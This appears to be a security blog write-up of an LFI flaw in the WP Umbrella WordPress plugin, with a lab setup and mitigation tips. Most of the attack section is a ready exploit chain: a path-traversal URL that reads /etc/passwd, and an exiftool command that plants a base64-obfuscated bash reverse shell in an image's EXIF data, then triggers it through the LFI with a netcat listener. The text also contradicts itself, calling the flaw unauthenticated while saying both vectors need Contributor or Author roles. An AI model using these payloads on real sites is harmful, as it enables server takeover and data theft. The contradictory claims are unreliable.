Critical LFI Vulnerability in WP Umbrella Allows RCE on WordPress Sites
A critical LFI vulnerability with CVSS 9.8 (CVE-2024-12209) has been discovered in the WP Umbrella plugin, used on over 30,000 WordPress sites. It affects the umbrella-restore endpoint via the filename parameter, allowing unauthenticated users to achieve remote code execution (RCE).
The plugin is designed for centralized monitoring and management of multiple WordPress sites, making it popular among agencies and freelancers. The vulnerability is exploited through dynamic file inclusion without path validation.
Setting Up the Test Environment
To reproduce, you'll need a local LAMP/XAMPP stack with PHP and MySQL. Install WordPress:
cd ~/Downloads
unzip wordpress-6.6.2.zip
sudo mv wordpress /opt/lampp/htdocs/
sudo chown -R daemon:daemon /opt/lampp/htdocs
Then run the installer at http://127.0.0.1/wordpress. Install the vulnerable version of the WP Umbrella plugin.
LFI Mechanism in umbrella-restore
The vulnerability arises due to the lack of sanitization of the filename parameter in PHP's include/require functions. An attacker can specify a path to an arbitrary file on the server.
Vector 1: Direct Reading of System Files (Contributor Role)
For roles without media upload permissions, path traversal is used:
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
This allows dumping the contents of /etc/passwd without additional privileges.
Vector 2: RCE via EXIF Metadata Injection (Author Role)
- Create a JPG file with a PHP payload in the EXIF comment:
exiftool -Comment="<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash')?>" name.jpg
- Upload the file via the admin: Media → Add New.
- Copy the URL of the uploaded file, e.g.,
/wp-content/uploads/2024/12/maxresdefault.jpg.
- Start a Netcat listener:
nc -lvnp 4444
- Exploit the LFI:
http://localhost/?umbrella-restore=1&filename=wp-content/uploads/2024/12/maxresdefault.jpg
The payload executes, establishing a reverse shell on port 4444.
Protection Recommendations
- Update the WP Umbrella plugin to the patched version.
- Implement a WAF with rules against path traversal (ModSecurity OWASP CRS).
- Disable access to
umbrella-restorefor unauthenticated users. - Use
open_basedirin php.ini to restrict filesystem access. - Regularly scan for LFI using Burp Suite or Nuclei.
Key Points
- The CVSS 9.8 vulnerability allows unauthenticated RCE on 30,000+ sites.
- Two vectors: direct LFI and injection via EXIF in uploaded media files.
- Exploitation requires only frontend access, Contributor role or higher.
- Patching is mandatory; without it, server takeover and data leakage are possible.
- Test in an isolated environment, avoid production.
— Editorial Team
No comments yet.